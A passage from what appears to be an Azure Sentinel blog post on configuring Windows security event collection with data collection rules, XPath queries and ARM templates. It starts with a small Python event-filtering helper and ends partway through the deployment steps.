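# Constructed sample log: two process creations, one logon, one privilege assignment.
SAMPLE_EVENTS = [
    _sample(1, 4688, {"NewProcessName": r"C:\Windows\System32\whoami.exe",
                      "ParentProcessName": r"C:\Windows\System32\cmd.exe"}),
    _sample(2, 4688, {"NewProcessName": r"C:\Windows\System32\consent.exe",
                      "ParentProcessName": r"C:\Windows\explorer.exe"}),
    _sample(3, 4624, {"LogonType": "3"}),
    _sample(4, 4672, {}),
]

if __name__ == "__main__":
    for q in (
        "Security!*[System[(EventID=4624)]]",
        "Security!*[System[(EventID=4624 or EventID=4688)]]",
        r"Security!*[System[EventID=4688]] and "
        r"*[EventData[Data[@Name='ParentProcessName']='C:\Windows\System32\cmd.exe']]",
    ):
        print(q, "->", filter_events(q, SAMPLE_EVENTS))
```

<P>The point of the namespace handling is the one place where a local XML tool and the agent disagree: the XPath you write for the connector (and for Get-WinEvent) uses bare element names, while an off-the-shelf XML library needs the event namespace spelled out. The log-name check mirrors the connector restriction above, so a query against Application or System is rejected before it ever reaches a data collection rule.</P>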
<P><SPAN data-contrast="auto">As mentioned&nbsp;earlier in this post,&nbsp;the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;uses&nbsp;the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Sources resource</SPAN></A><SPAN data-contrast="auto">&nbsp;from the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Workspace</SPAN></A><SPAN data-contrast="auto">&nbsp;resource to set the collection tier of Windows security events.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the&nbsp;Azure Resource Manager (ARM)&nbsp;template&nbsp;I use&nbsp;in&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go</SPAN></A><SPAN data-contrast="auto">&nbsp;to set it up:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/securityEvents.json at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Data Sources Azure Resource</SPAN></STRONG></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">{</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "type": "Microsoft.OperationalInsights/workspaces/dataSources",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "apiVersion": "2020-03-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "location": "eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "name": "WORKSPACE/SecurityInsightsSecurityEventCollectionConfiguration",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "kind": 
"SecurityInsightsSecurityEventCollectionConfiguration",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "tier": "All",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "tierSetMethod": "Custom"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">However, the&nbsp;</SPAN><STRONG><SPAN data-contrast="none">new connector</SPAN></STRONG><SPAN data-contrast="none">&nbsp;uses a combination of&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connection Rules (DCR)</SPAN></A><SPAN data-contrast="none">&nbsp;and&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Connector Rules Association (DCRA)</SPAN></A><SPAN data-contrast="none">.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">This is the&nbsp;ARM&nbsp;template&nbsp;I&nbsp;use to create data collection rules:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/creation-azureresource.json at master · OTRF/Azure-Sentinel2Go (github.com)</A>&nbsp;<BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Data Collection Rules Azure Resource</SPAN></STRONG><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">{</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "type": "microsoft.insights/dataCollectionRules",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 
data-contrast="none">&nbsp; "apiVersion": "2019-11-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "name": "WindowsDCR",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "location": "eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "tags": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "createdBy": "Sentinel"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR 
/></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "destinations": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "logAnalytics": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "SecurityEvent",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "workspaceId": "AZURE-SENTINEL-WORKSPACEID",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "workspaceResourceId": "AZURE-SENTINEL-WORKSPACERESOURCEID"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; },</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; "dataFlows": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "destinations": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 
data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One additional step&nbsp;in the setup of the&nbsp;new connector is the association of the DCR&nbsp;with&nbsp;Virtual Machines.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the&nbsp;ARM&nbsp;template&nbsp;I&nbsp;use to create DCRAs:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/association.json at master · OTRF/Azure-Sentinel2Go (github.com)</A><BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Data Collection Rule Associations Azure Resource</SPAN></STRONG></P> <P>&nbsp;</P> <PRE><SPAN>{<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "name": "WORKSTATION5/microsoft.insights/WindowsDCR",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">"type": "Microsoft.Compute/virtualMachines/providers/dataCollectionRuleAssociations",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "apiVersion": "2019-11-01-preview",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "location": 
"eastus",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp; "properties": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">"description": "Association of data collection rule. Deleting this association will break the data collection for this virtual machine.",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; "dataCollectionRuleId": "DATACOLLECTIONRULEID"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">}</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">What about the XPath Queries?</SPAN></STRONG></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As shown in the previous section, the XPath query is part of the “<STRONG>dataSources</STRONG>” section of the data collection rule resource. It is defined under the&nbsp;‘<STRONG>windowsEventLogs</STRONG>’&nbsp;data source type.</SPAN><SPAN>&nbsp;<BR /></SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">"dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN 
data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <H3 aria-level="2">&nbsp;</H3> <H3 aria-level="2"><SPAN data-contrast="none">Create Deployment Template</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can&nbsp;easily&nbsp;add all those ARM&nbsp;templates to an ‘</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel &amp; Win10 Workstation</SPAN></A><SPAN data-contrast="auto">’ basic&nbsp;</SPAN><SPAN data-contrast="auto">template</SPAN><SPAN data-contrast="auto">.&nbsp;</SPAN><SPAN data-contrast="auto">We just need to make sure we&nbsp;install the&nbsp;<STRONG>Azure Monitor Agent</STRONG></SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">instead of the <STRONG>Log Analytics</STRONG>&nbsp;one</SPAN><SPAN data-contrast="auto">,&nbsp;</SPAN><SPAN data-contrast="auto">and enable&nbsp;the</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">system-assigned managed identity</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">in the Azure VM.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Template Resource List to Deploy:</SPAN></STRONG><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel Instance</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Windows Virtual Machine</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Monitor Agent Installed</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">System-assigned managed identity Enabled.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Log Analytics Workspace ID</SPAN><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Log Analytics Workspace Resource ID</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule Association</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Data Collection Rule ID</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="34" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Windows Virtual Machine Resource Name</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The following ARM template can be used for our first basic&nbsp;scenario</SPAN><SPAN data-contrast="auto">:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-AzureResource.json at master · OTRF/Azure-Sentinel2Go (github.com)</A><BR /><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">Run Deployment Template</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can deploy the ARM template via a “</SPAN><A href="#" target="_blank" rel="noopener"><SPAN 
data-contrast="none">Deploy to Azure</SPAN></A><SPAN data-contrast="auto">”&nbsp;</SPAN><SPAN data-contrast="auto">button&nbsp;or via <A href="#" target="_self">Azure CLI</A>.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="3">&nbsp;</P> <H4 aria-level="3"><SPAN data-contrast="none">“Deploy to Azure”&nbsp;Button</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <OL> <LI aria-level="3"><SPAN data-contrast="auto">Browse to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel2Go repository</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">Go to grocery-list/Win10/demos.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">Click on the “<STRONG>Deploy to Azure</STRONG>” button next to “<STRONG>Azure Sentinel + Win10 + DCR (DCR Resource)</STRONG>”</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /><BR /></SPAN></SPAN><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624589431099.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291177iAAA49D3342EE5F7D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624589431099.png" alt="Cyb3rWard0g_0-1624589431099.png" /></span> <P>&nbsp;</P> </LI> <LI aria-level="3"><SPAN 
data-contrast="auto">Fill out the required parameters:</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI aria-level="3"><SPAN data-contrast="auto">adminUsername: admin user to create in the Windows workstation.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">adminPassword: password for admin user.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI aria-level="3"><SPAN data-contrast="auto">allowedIPAddresses: Public IP address to&nbsp;restrict access to the lab environment.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> <LI aria-level="3"><SPAN data-contrast="auto">Wait 5-10 mins and your environment should be ready.</SPAN><BR /><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <H4 aria-level="3"><SPAN data-contrast="none">Azure CLI</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <OL> <LI><SPAN data-contrast="auto">Download <A href="#" target="_self">demo template</A>.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI><SPAN data-contrast="auto">Open a terminal where you can&nbsp;run&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure CLI</SPAN></A><SPAN data-contrast="auto">&nbsp;from (i.e.&nbsp;PowerShell).</SPAN><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI><SPAN data-contrast="auto">Log in to your Azure tenant locally.<BR /><BR /></SPAN> <PRE><SPAN data-contrast="none">az login</SPAN>&nbsp;</PRE> </LI> <LI><SPAN data-contrast="auto">Create a resource group (optional).<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN> <PRE><SPAN data-contrast="none">az group create -n AzSentinelDemo -l eastus</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> </LI> <LI><SPAN data-contrast="auto">Deploy the ARM template locally (the values in capitals and x.x.x.x are placeholders for your own resource group, credentials and public IP address).<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN> <PRE><SPAN data-contrast="none">az deployment group create -f ./Win10-DCR-AzureResource.json -g MYRESOURCEGROUP --parameters adminUsername=MYUSER adminPassword=MYUSERPASSWORD allowedIPAddresses=x.x.x.x</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> </LI> <LI><SPAN data-contrast="auto">Wait 5-10 mins and your environment should be ready.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </OL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Whether you use the UI or the CLI, you can monitor your deployment&nbsp;by going to Resource Group &gt; Deployments:</SPAN></P> <P><SPAN 
